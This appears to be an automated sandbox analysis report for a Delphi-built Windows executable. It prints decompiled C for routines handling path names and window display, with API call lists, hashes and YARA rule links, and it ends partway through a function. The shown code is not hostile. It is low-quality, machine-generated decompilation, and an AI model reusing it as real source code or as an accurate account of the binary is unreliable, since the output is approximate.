                                                                                • Instruction Fuzzy Hash: A83125F1E453406EE700EB66EC56A1A37A8E704714B21C83FF601D7292D7BCA8649F9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405AC0, Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 136stringlibraryfileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 53%
                                                                                			E00405AC0(char* __eax, intOrPtr __edx) {
				char* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				struct _WIN32_FIND_DATAA _v334;
				char _v595;
				void* _t45;
				char* _t54;
				char* _t64;
				void* _t83;
				intOrPtr* _t84;
				char* _t90;
				struct HINSTANCE__* _t91;
				char* _t93;
				void* _t94;
				char* _t95;
				void* _t96;

				_v12 = __edx;
				_v8 = __eax;
				_v16 = _v8;
				_t91 = GetModuleHandleA("kernel32.dll");
				if(_t91 == 0) {
					L4:
					if( *_v8 != 0x5c) {
						_t93 = _v8 + 2;
						goto L10;
					} else {
						if( *((char*)(_v8 + 1)) == 0x5c) {
							_t95 = E00405AAC(_v8 + 2);
							if( *_t95 != 0) {
								_t14 = _t95 + 1; // 0x1
								_t93 = E00405AAC(_t14);
								if( *_t93 != 0) {
									L10:
									_t83 = _t93 - _v8;
									_push(_t83 + 1);
									_push(_v8);
									_push( &_v595);
									L00401310();
									while( *_t93 != 0) {
										_t90 = E00405AAC(_t93 + 1);
										_t45 = _t90 - _t93;
										if(_t45 + _t83 + 1 <= 0x105) {
											_push(_t45 + 1);
											_push(_t93);
											_push( &(( &_v595)[_t83]));
											L00401310();
											_t94 = FindFirstFileA( &_v595,  &_v334);
											if(_t94 != 0xffffffff) {
												FindClose(_t94);
												_t54 =  &(_v334.cFileName);
												_push(_t54);
												L00401318();
												if(_t54 + _t83 + 1 + 1 <= 0x105) {
													 *((char*)(_t96 + _t83 - 0x24f)) = 0x5c;
													_push(0x105 - _t83 - 1);
													_push( &(_v334.cFileName));
													_push( &(( &(( &_v595)[_t83]))[1]));
													L00401310();
													_t64 =  &(_v334.cFileName);
													_push(_t64);
													L00401318();
													_t83 = _t83 + _t64 + 1;
													_t93 = _t90;
													continue;
												}
											}
										}
										goto L17;
									}
									_push(_v12);
									_push( &_v595);
									_push(_v8);
									L00401310();
								}
							}
						}
					}
				} else {
					_t84 = GetProcAddress(_t91, "GetLongPathNameA");
					if(_t84 == 0) {
						goto L4;
					} else {
						_push(0x105);
						_push( &_v595);
						_push(_v8);
						if( *_t84() == 0) {
							goto L4;
						} else {
							_push(_v12);
							_push( &_v595);
							_push(_v8);
							L00401310();
						}
					}
				}
				L17:
				return _v16;
			}



















                                                                                0x00405acc
                                                                                0x00405acf
                                                                                0x00405ad5
                                                                                0x00405ae2
                                                                                0x00405ae6
                                                                                0x00405b28
                                                                                0x00405b2e
                                                                                0x00405b6b
                                                                                0x00000000
                                                                                0x00405b30
                                                                                0x00405b37
                                                                                0x00405b48
                                                                                0x00405b4d
                                                                                0x00405b53
                                                                                0x00405b5b
                                                                                0x00405b60
                                                                                0x00405b6e
                                                                                0x00405b70
                                                                                0x00405b76
                                                                                0x00405b7a
                                                                                0x00405b81
                                                                                0x00405b82
                                                                                0x00405c2d
                                                                                0x00405b94
                                                                                0x00405b98
                                                                                0x00405ba5
                                                                                0x00405bac
                                                                                0x00405bad
                                                                                0x00405bb6
                                                                                0x00405bb7
                                                                                0x00405bcf
                                                                                0x00405bd4
                                                                                0x00405bd7
                                                                                0x00405bdc
                                                                                0x00405be2
                                                                                0x00405be3
                                                                                0x00405bf3
                                                                                0x00405bf5
                                                                                0x00405c05
                                                                                0x00405c0c
                                                                                0x00405c16
                                                                                0x00405c17
                                                                                0x00405c1c
                                                                                0x00405c22
                                                                                0x00405c23
                                                                                0x00405c29
                                                                                0x00405c2b
                                                                                0x00000000
                                                                                0x00405c2b
                                                                                0x00405bf3
                                                                                0x00405bd4
                                                                                0x00000000
                                                                                0x00405ba5
                                                                                0x00405c39
                                                                                0x00405c40
                                                                                0x00405c44
                                                                                0x00405c45
                                                                                0x00405c45
                                                                                0x00405b60
                                                                                0x00405b4d
                                                                                0x00405b37
                                                                                0x00405ae8
                                                                                0x00405af3
                                                                                0x00405af7
                                                                                0x00000000
                                                                                0x00405af9
                                                                                0x00405af9
                                                                                0x00405b04
                                                                                0x00405b08
                                                                                0x00405b0d
                                                                                0x00000000
                                                                                0x00405b0f
                                                                                0x00405b12
                                                                                0x00405b19
                                                                                0x00405b1d
                                                                                0x00405b1e
                                                                                0x00405b1e
                                                                                0x00405b0d
                                                                                0x00405af7
                                                                                0x00405c4a
                                                                                0x00405c53

                                                                                APIs
                                                                                • GetModuleHandleA.KERNEL32(kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00405ADD
                                                                                • GetProcAddress.KERNEL32(00000000,GetLongPathNameA), ref: 00405AEE
                                                                                • lstrcpyn.KERNEL32(?,?,?,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019,?), ref: 00405B1E
                                                                                • lstrcpyn.KERNEL32(?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001,Software\Borland\Locales,00000000,000F0019), ref: 00405B82
                                                                                • lstrcpyn.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D,?,80000001), ref: 00405BB7
                                                                                • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000,00405D7D), ref: 00405BCA
                                                                                • FindClose.KERNEL32(00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20,00000000), ref: 00405BD7
                                                                                • lstrlen.KERNEL32(?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001,0046B08C,?,00405D20), ref: 00405BE3
                                                                                • lstrcpyn.KERNEL32(0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll,?,00000001), ref: 00405C17
                                                                                • lstrlen.KERNEL32(?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?,?,kernel32.dll), ref: 00405C23
                                                                                • lstrcpyn.KERNEL32(?,0000005C,?,?,0000005D,?,00000104,?,00000000,?,?,?,?,00000001,?,?), ref: 00405C45
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                • API String ID: 3245196872-1565342463
                                                                                • Opcode ID: 205054ec60151739824bfc0cfe4213723e452c19be612335f9d6d27625c40468
                                                                                • Instruction ID: 296a13db2414833b3bf80d2bdfa437c82c634a9cd7f8270e4b53d567bb21fe4a
                                                                                • Opcode Fuzzy Hash: 205054ec60151739824bfc0cfe4213723e452c19be612335f9d6d27625c40468
                                                                                • Instruction Fuzzy Hash: BD416072900619ABEB10DAA8CC85EDFB7EDDF44314F1405B7B949F7281D638AE408F68
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00451994, Relevance: 18.4, APIs: 12, Instructions: 407windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 83%
                                                                                			E00451994(intOrPtr* __eax, void* __ebx, void* __edi, void* __esi) {
				intOrPtr* _v8;
				char _v12;
				intOrPtr _t149;
				intOrPtr _t154;
				intOrPtr _t155;
				intOrPtr _t160;
				intOrPtr _t162;
				intOrPtr _t163;
				void* _t165;
				struct HWND__* _t166;
				long _t176;
				signed int _t198;
				signed int _t199;
				long _t220;
				intOrPtr _t226;
				int _t231;
				intOrPtr _t232;
				intOrPtr _t241;
				intOrPtr _t245;
				signed int _t248;
				intOrPtr _t251;
				intOrPtr _t252;
				signed int _t258;
				long _t259;
				intOrPtr _t262;
				intOrPtr _t266;
				signed int _t269;
				intOrPtr _t270;
				intOrPtr _t271;
				signed int _t277;
				long _t278;
				intOrPtr _t281;
				signed int _t286;
				signed int _t287;
				long _t290;
				intOrPtr _t294;
				struct HWND__* _t299;
				signed int _t301;
				signed int _t302;
				signed int _t305;
				signed int _t307;
				long _t308;
				signed int _t311;
				signed int _t313;
				long _t314;
				signed int _t317;
				signed int _t318;
				signed int _t326;
				long _t328;
				intOrPtr _t331;
				intOrPtr _t362;
				long _t370;
				void* _t372;
				void* _t373;
				intOrPtr _t374;

				_t372 = _t373;
				_t374 = _t373 + 0xfffffff8;
				_v12 = 0;
				_v8 = __eax;
				_push(_t372);
				_push(0x451efe);
				_push( *[fs:eax]);
				 *[fs:eax] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0 && ( *(_v8 + 0x2ec) & 0x00000004) != 0) {
					_t294 =  *0x486dc0; // 0x41cc74
					E00406520(_t294,  &_v12);
					E0040A0B0(_v12, 1);
					E00403D80();
				}
				_t149 =  *0x487bfc; // 0x2291310
				E00455F6C(_t149);
				 *(_v8 + 0x2ec) =  *(_v8 + 0x2ec) | 0x00000004;
				_push(_t372);
				_push(0x451ee1);
				_push( *[fs:edx]);
				 *[fs:edx] = _t374;
				if(( *(_v8 + 0x1c) & 0x00000010) == 0) {
					_t155 = _v8;
					_t378 =  *((char*)(_t155 + 0x1a6));
					if( *((char*)(_t155 + 0x1a6)) == 0) {
						_push(_t372);
						_push(0x451de8);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037B0(_v8, __eflags);
						 *[fs:eax] = 0;
						_t160 =  *0x487c00; // 0x2290f1c
						__eflags =  *((intOrPtr*)(_t160 + 0x6c)) - _v8;
						if( *((intOrPtr*)(_t160 + 0x6c)) == _v8) {
							__eflags = 0;
							E00450B80(_v8, 0);
						}
						_t162 = _v8;
						__eflags =  *((char*)(_t162 + 0x22f)) - 1;
						if( *((char*)(_t162 + 0x22f)) != 1) {
							_t163 = _v8;
							__eflags =  *(_t163 + 0x2ec) & 0x00000008;
							if(( *(_t163 + 0x2ec) & 0x00000008) == 0) {
								_t299 = 0;
								_t165 = E0043BD14(_v8);
								_t166 = GetActiveWindow();
								__eflags = _t165 - _t166;
								if(_t165 == _t166) {
									_t176 = IsIconic(E0043BD14(_v8));
									__eflags = _t176;
									if(_t176 == 0) {
										_t299 = E0044C7E0(E0043BD14(_v8));
									}
								}
								__eflags = _t299;
								if(_t299 == 0) {
									ShowWindow(E0043BD14(_v8), 0);
								} else {
									SetWindowPos(E0043BD14(_v8), 0, 0, 0, 0, 0, 0x97);
									SetActiveWindow(_t299);
								}
							} else {
								SetWindowPos(E0043BD14(_v8), 0, 0, 0, 0, 0, 0x97);
							}
						} else {
							E00439390(_v8);
						}
					} else {
						_push(_t372);
						_push(0x451a4c);
						_push( *[fs:eax]);
						 *[fs:eax] = _t374;
						E004037B0(_v8, _t378);
						 *[fs:eax] = 0;
						if( *((char*)(_v8 + 0x230)) == 4 ||  *((char*)(_v8 + 0x230)) == 6 &&  *((char*)(_v8 + 0x22f)) == 1) {
							if( *((char*)(_v8 + 0x22f)) != 1) {
								_t301 = E004531C4() -  *(_v8 + 0x48);
								__eflags = _t301;
								_t302 = _t301 >> 1;
								if(_t301 < 0) {
									asm("adc ebx, 0x0");
								}
								_t198 = E004531B8() -  *(_v8 + 0x4c);
								__eflags = _t198;
								_t199 = _t198 >> 1;
								if(_t198 < 0) {
									asm("adc eax, 0x0");
								}
							} else {
								_t241 =  *0x487bfc; // 0x2291310
								_t305 = E004350A4( *((intOrPtr*)(_t241 + 0x44))) -  *(_v8 + 0x48);
								_t302 = _t305 >> 1;
								if(_t305 < 0) {
									asm("adc ebx, 0x0");
								}
								_t245 =  *0x487bfc; // 0x2291310
								_t248 = E004350E8( *((intOrPtr*)(_t245 + 0x44))) -  *(_v8 + 0x4c);
								_t199 = _t248 >> 1;
								if(_t248 < 0) {
									asm("adc eax, 0x0");
								}
							}
							if(_t302 < 0) {
								_t302 = 0;
							}
							if(_t199 < 0) {
								_t199 = 0;
							}
							_t326 = _t199;
							 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
							if( *((char*)(_v8 + 0x57)) != 0) {
								E0044FE34(_v8, _t326);
							}
						} else {
							_t251 =  *((intOrPtr*)(_v8 + 0x230));
							__eflags = _t251 + 0xfa - 2;
							if(_t251 + 0xfa - 2 >= 0) {
								__eflags = _t251 - 5;
								if(_t251 == 5) {
									_t252 = _v8;
									__eflags =  *((char*)(_t252 + 0x22f)) - 1;
									if( *((char*)(_t252 + 0x22f)) != 1) {
										_t307 = E004531F4() -  *(_v8 + 0x48);
										__eflags = _t307;
										_t308 = _t307 >> 1;
										if(_t307 < 0) {
											asm("adc ebx, 0x0");
										}
										_t258 = E004531E8() -  *(_v8 + 0x4c);
										__eflags = _t258;
										_t259 = _t258 >> 1;
										if(_t258 < 0) {
											asm("adc eax, 0x0");
										}
									} else {
										_t262 =  *0x487bfc; // 0x2291310
										_t311 = E004350A4( *((intOrPtr*)(_t262 + 0x44))) -  *(_v8 + 0x48);
										__eflags = _t311;
										_t308 = _t311 >> 1;
										if(_t311 < 0) {
											asm("adc ebx, 0x0");
										}
										_t266 =  *0x487bfc; // 0x2291310
										_t269 = E004350E8( *((intOrPtr*)(_t266 + 0x44))) -  *(_v8 + 0x4c);
										__eflags = _t269;
										_t259 = _t269 >> 1;
										if(_t269 < 0) {
											asm("adc eax, 0x0");
										}
									}
									__eflags = _t308;
									if(_t308 < 0) {
										_t308 = 0;
										__eflags = 0;
									}
									__eflags = _t259;
									if(_t259 < 0) {
										_t259 = 0;
										__eflags = 0;
									}
									 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								}
							} else {
								_t270 =  *0x487bfc; // 0x2291310
								_t370 =  *(_t270 + 0x44);
								_t271 = _v8;
								__eflags =  *((char*)(_t271 + 0x230)) - 7;
								if( *((char*)(_t271 + 0x230)) == 7) {
									_t362 =  *0x44b170; // 0x44b1bc
									_t290 = E00403740( *(_v8 + 4), _t362);
									__eflags = _t290;
									if(_t290 != 0) {
										_t370 =  *(_v8 + 4);
									}
								}
								__eflags = _t370;
								if(_t370 == 0) {
									_t313 = E004531C4() -  *(_v8 + 0x48);
									__eflags = _t313;
									_t314 = _t313 >> 1;
									if(_t313 < 0) {
										asm("adc ebx, 0x0");
									}
									_t277 = E004531B8() -  *(_v8 + 0x4c);
									__eflags = _t277;
									_t278 = _t277 >> 1;
									if(_t277 < 0) {
										asm("adc eax, 0x0");
									}
								} else {
									_t317 =  *((intOrPtr*)(_t370 + 0x48)) -  *(_v8 + 0x48);
									__eflags = _t317;
									_t318 = _t317 >> 1;
									if(_t317 < 0) {
										asm("adc ebx, 0x0");
									}
									_t314 = _t318 +  *((intOrPtr*)(_t370 + 0x40));
									_t286 =  *((intOrPtr*)(_t370 + 0x4c)) -  *(_v8 + 0x4c);
									__eflags = _t286;
									_t287 = _t286 >> 1;
									if(_t286 < 0) {
										asm("adc eax, 0x0");
									}
									_t278 = _t287 +  *((intOrPtr*)(_t370 + 0x44));
								}
								__eflags = _t314;
								if(_t314 < 0) {
									_t314 = 0;
									__eflags = 0;
								}
								__eflags = _t278;
								if(_t278 < 0) {
									_t278 = 0;
									__eflags = 0;
								}
								_t328 = _t278;
								 *((intOrPtr*)( *_v8 + 0x84))( *(_v8 + 0x4c),  *(_v8 + 0x48));
								_t281 = _v8;
								__eflags =  *((char*)(_t281 + 0x57));
								if( *((char*)(_t281 + 0x57)) != 0) {
									E0044FE34(_v8, _t328);
								}
							}
						}
						 *((char*)(_v8 + 0x230)) = 0;
						if( *((char*)(_v8 + 0x22f)) != 1) {
							ShowWindow(E0043BD14(_v8),  *(0x46bb98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
						} else {
							if( *(_v8 + 0x22b) != 2) {
								ShowWindow(E0043BD14(_v8),  *(0x46bb98 + ( *(_v8 + 0x22b) & 0x000000ff) * 4));
								_t220 =  *(_v8 + 0x48) |  *(_v8 + 0x4c) << 0x00000010;
								__eflags = _t220;
								CallWindowProcA(0x406cf0, E0043BD14(_v8), 5, 0, _t220);
								E00435900();
							} else {
								_t231 = E0043BD14(_v8);
								_t232 =  *0x487bfc; // 0x2291310
								SendMessageA( *( *((intOrPtr*)(_t232 + 0x44)) + 0x254), 0x223, _t231, 0);
								ShowWindow(E0043BD14(_v8), 3);
							}
							_t226 =  *0x487bfc; // 0x2291310
							SendMessageA( *( *((intOrPtr*)(_t226 + 0x44)) + 0x254), 0x234, 0, 0);
						}
					}
				}
				_pop(_t331);
				 *[fs:eax] = _t331;
				_push(0x451ee8);
				_t154 = _v8;
				 *(_t154 + 0x2ec) =  *(_t154 + 0x2ec) & 0x000000fb;
				return _t154;
			}


























































                                                                                0x00451995
                                                                                0x00451997
                                                                                0x0045199f
                                                                                0x004519a2
                                                                                0x004519a7
                                                                                0x004519a8
                                                                                0x004519ad
                                                                                0x004519b0
                                                                                0x004519ba
                                                                                0x004519cb
                                                                                0x004519d0
                                                                                0x004519df
                                                                                0x004519e4
                                                                                0x004519e4
                                                                                0x004519e9
                                                                                0x004519ee
                                                                                0x004519f6
                                                                                0x004519ff
                                                                                0x00451a00
                                                                                0x00451a05
                                                                                0x00451a08
                                                                                0x00451a12
                                                                                0x00451a18
                                                                                0x00451a1b
                                                                                0x00451a22
                                                                                0x00451dc6
                                                                                0x00451dc7
                                                                                0x00451dcc
                                                                                0x00451dcf
                                                                                0x00451dd9
                                                                                0x00451de3
                                                                                0x00451dff
                                                                                0x00451e07
                                                                                0x00451e0a
                                                                                0x00451e0c
                                                                                0x00451e11
                                                                                0x00451e11
                                                                                0x00451e16
                                                                                0x00451e19
                                                                                0x00451e20
                                                                                0x00451e2f
                                                                                0x00451e32
                                                                                0x00451e39
                                                                                0x00451e5a
                                                                                0x00451e5f
                                                                                0x00451e66
                                                                                0x00451e6b
                                                                                0x00451e6d
                                                                                0x00451e78
                                                                                0x00451e7d
                                                                                0x00451e7f
                                                                                0x00451e8e
                                                                                0x00451e8e
                                                                                0x00451e7f
                                                                                0x00451e90
                                                                                0x00451e92
                                                                                0x00451ec4
                                                                                0x00451e94
                                                                                0x00451eac
                                                                                0x00451eb2
                                                                                0x00451eb2
                                                                                0x00451e3b
                                                                                0x00451e53
                                                                                0x00451e53
                                                                                0x00451e22
                                                                                0x00451e25
                                                                                0x00451e25
                                                                                0x00451a28
                                                                                0x00451a2a
                                                                                0x00451a2b
                                                                                0x00451a30
                                                                                0x00451a33
                                                                                0x00451a3d
                                                                                0x00451a47
                                                                                0x00451a6d
                                                                                0x00451a99
                                                                                0x00451ae2
                                                                                0x00451ae2
                                                                                0x00451ae5
                                                                                0x00451ae7
                                                                                0x00451ae9
                                                                                0x00451ae9
                                                                                0x00451af9
                                                                                0x00451af9
                                                                                0x00451afc
                                                                                0x00451afe
                                                                                0x00451b00
                                                                                0x00451b00
                                                                                0x00451a9b
                                                                                0x00451a9b
                                                                                0x00451aad
                                                                                0x00451ab0
                                                                                0x00451ab2
                                                                                0x00451ab4
                                                                                0x00451ab4
                                                                                0x00451ab7
                                                                                0x00451ac7
                                                                                0x00451aca
                                                                                0x00451acc
                                                                                0x00451ace
                                                                                0x00451ace
                                                                                0x00451acc
                                                                                0x00451b05
                                                                                0x00451b07
                                                                                0x00451b07
                                                                                0x00451b0b
                                                                                0x00451b0d
                                                                                0x00451b0d
                                                                                0x00451b1d
                                                                                0x00451b26
                                                                                0x00451b33
                                                                                0x00451b3c
                                                                                0x00451b3c
                                                                                0x00451b46
                                                                                0x00451b49
                                                                                0x00451b54
                                                                                0x00451b57
                                                                                0x00451c2b
                                                                                0x00451c2d
                                                                                0x00451c33
                                                                                0x00451c36
                                                                                0x00451c3d
                                                                                0x00451c86
                                                                                0x00451c86
                                                                                0x00451c89
                                                                                0x00451c8b
                                                                                0x00451c8d
                                                                                0x00451c8d
                                                                                0x00451c9d
                                                                                0x00451c9d
                                                                                0x00451ca0
                                                                                0x00451ca2
                                                                                0x00451ca4
                                                                                0x00451ca4
                                                                                0x00451c3f
                                                                                0x00451c3f
                                                                                0x00451c51
                                                                                0x00451c51
                                                                                0x00451c54
                                                                                0x00451c56
                                                                                0x00451c58
                                                                                0x00451c58
                                                                                0x00451c5b
                                                                                0x00451c6b
                                                                                0x00451c6b
                                                                                0x00451c6e
                                                                                0x00451c70
                                                                                0x00451c72
                                                                                0x00451c72
                                                                                0x00451c70
                                                                                0x00451ca7
                                                                                0x00451ca9
                                                                                0x00451cab
                                                                                0x00451cab
                                                                                0x00451cab
                                                                                0x00451cad
                                                                                0x00451caf
                                                                                0x00451cb1
                                                                                0x00451cb1
                                                                                0x00451cb1
                                                                                0x00451cca
                                                                                0x00451cca
                                                                                0x00451b5d
                                                                                0x00451b5d
                                                                                0x00451b62
                                                                                0x00451b65
                                                                                0x00451b68
                                                                                0x00451b6f
                                                                                0x00451b77
                                                                                0x00451b7d
                                                                                0x00451b82
                                                                                0x00451b84
                                                                                0x00451b89
                                                                                0x00451b89
                                                                                0x00451b84
                                                                                0x00451b8c
                                                                                0x00451b8e
                                                                                0x00451bc7
                                                                                0x00451bc7
                                                                                0x00451bca
                                                                                0x00451bcc
                                                                                0x00451bce
                                                                                0x00451bce
                                                                                0x00451bde
                                                                                0x00451bde
                                                                                0x00451be1
                                                                                0x00451be3
                                                                                0x00451be5
                                                                                0x00451be5
                                                                                0x00451b90
                                                                                0x00451b96
                                                                                0x00451b96
                                                                                0x00451b99
                                                                                0x00451b9b
                                                                                0x00451b9d
                                                                                0x00451b9d
                                                                                0x00451ba0
                                                                                0x00451ba9
                                                                                0x00451ba9
                                                                                0x00451bac
                                                                                0x00451bae
                                                                                0x00451bb0
                                                                                0x00451bb0
                                                                                0x00451bb3
                                                                                0x00451bb3
                                                                                0x00451be8
                                                                                0x00451bea
                                                                                0x00451bec
                                                                                0x00451bec
                                                                                0x00451bec
                                                                                0x00451bee
                                                                                0x00451bf0
                                                                                0x00451bf2
                                                                                0x00451bf2
                                                                                0x00451bf2
                                                                                0x00451c02
                                                                                0x00451c0b
                                                                                0x00451c11
                                                                                0x00451c14
                                                                                0x00451c18
                                                                                0x00451c21
                                                                                0x00451c21
                                                                                0x00451c18
                                                                                0x00451b57
                                                                                0x00451cd3
                                                                                0x00451ce4
                                                                                0x00451dba
                                                                                0x00451cea
                                                                                0x00451cf4
                                                                                0x00451d47
                                                                                0x00451d5b
                                                                                0x00451d5b
                                                                                0x00451d70
                                                                                0x00451d78
                                                                                0x00451cf6
                                                                                0x00451cfb
                                                                                0x00451d06
                                                                                0x00451d15
                                                                                0x00451d25
                                                                                0x00451d25
                                                                                0x00451d86
                                                                                0x00451d95
                                                                                0x00451d95
                                                                                0x00451ce4
                                                                                0x00451a22
                                                                                0x00451ecb
                                                                                0x00451ece
                                                                                0x00451ed1
                                                                                0x00451ed6
                                                                                0x00451ed9
                                                                                0x00451ee0

                                                                                APIs
                                                                                • SendMessageA.USER32(?,00000223,00000000,00000000), ref: 00451D15
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: LoadMessageSendString
                                                                                • String ID:
                                                                                • API String ID: 1946433856-0
                                                                                • Opcode ID: 541b26ac64cf00f76a0f80d0906944bc33b71ebc3d0579da3fa8d669e40ef3c6
                                                                                • Instruction ID: e9062d91b70e892c12dd907cc0b9357d82f2089669128c1fe80cc258a350db4e
                                                                                • Opcode Fuzzy Hash: 541b26ac64cf00f76a0f80d0906944bc33b71ebc3d0579da3fa8d669e40ef3c6
                                                                                • Instruction Fuzzy Hash: 49F15D30A04244EFDB01DBA9C985F9E77F5AB08305F2545AAE9009B3A3D739FE44DB58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0043C024, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 64windowCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 75%
                                                                                			E0043C024(void* __eax) {
				void* _v28;
				struct _WINDOWPLACEMENT _v56;
				struct tagPOINT _v64;
				intOrPtr _v68;
				void* _t43;
				struct HWND__* _t45;
				struct tagPOINT* _t47;

				_t47 =  &(_v64.y);
				_t43 = __eax;
				if(IsIconic( *(__eax + 0x180)) == 0) {
					GetWindowRect( *(_t43 + 0x180), _t47);
				} else {
					_v56.length = 0x2c;
					GetWindowPlacement( *(_t43 + 0x180),  &_v56);
					asm("movsd");
					asm("movsd");
					asm("movsd");
					asm("movsd");
				}
				if((GetWindowLongA( *(_t43 + 0x180), 0xfffffff0) & 0x40000000) != 0) {
					_t45 = GetWindowLongA( *(_t43 + 0x180), 0xfffffff8);
					if(_t45 != 0) {
						ScreenToClient(_t45, _t47);
						ScreenToClient(_t45,  &_v64);
					}
				}
				 *(_t43 + 0x40) = _t47->x;
				 *((intOrPtr*)(_t43 + 0x44)) = _v68;
				 *((intOrPtr*)(_t43 + 0x48)) = _v64.x - _t47->x;
				 *((intOrPtr*)(_t43 + 0x4c)) = _v64.y.x - _v68;
				return E00434CF4(_t43);
			}










                                                                                0x0043c027
                                                                                0x0043c02a
                                                                                0x0043c03a
                                                                                0x0043c069
                                                                                0x0043c03c
                                                                                0x0043c03c
                                                                                0x0043c050
                                                                                0x0043c05b
                                                                                0x0043c05c
                                                                                0x0043c05d
                                                                                0x0043c05e
                                                                                0x0043c05e
                                                                                0x0043c081
                                                                                0x0043c091
                                                                                0x0043c095
                                                                                0x0043c099
                                                                                0x0043c0a4
                                                                                0x0043c0a4
                                                                                0x0043c095
                                                                                0x0043c0ac
                                                                                0x0043c0b3
                                                                                0x0043c0bd
                                                                                0x0043c0c8
                                                                                0x0043c0d8

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp Download File
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp Download File
                                                                                Similarity
                                                                                • API ID: Window$ClientLongScreen$IconicPlacementRect
                                                                                • String ID: ,
                                                                                • API String ID: 2266315723-3772416878
                                                                                • Opcode ID: dc5772d4a008edf40654639b35feea52976f6a5ef6516a43678eb87f8e2e69f7
                                                                                • Instruction ID: 4f0afc93a760560917b7b20bdae421720c013cc4146441cd6652f2517ecf09cd
                                                                                • Opcode Fuzzy Hash: dc5772d4a008edf40654639b35feea52976f6a5ef6516a43678eb87f8e2e69f7
                                                                                • Instruction Fuzzy Hash: 25118171504201AFCB11DE6DC881A8B77E8AF4D314F044A3EFD58EB386D739D9048B66
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00449408, Relevance: 10.9, APIs: 7, Instructions: 405nativeCOMMONCrypto
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 91%
                                                                                			E00449408(intOrPtr __eax, void* __ebx, intOrPtr* __edx, void* __edi, void* __esi) {
				intOrPtr _v8;
				struct HMENU__* _v12;
				signed int _v16;
				char _v17;
				intOrPtr _v24;
				int _v28;
				struct HDC__* _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr* _v48;
				char _v52;
				intOrPtr _t137;
				signed int _t138;
				intOrPtr _t144;
				signed int _t150;
				signed int _t151;
				intOrPtr* _t153;
				void* _t158;
				struct HMENU__* _t160;
				intOrPtr* _t165;
				void* _t173;
				signed int _t177;
				signed int _t181;
				void* _t182;
				void* _t214;
				struct HDC__* _t221;
				void* _t251;
				signed int _t257;
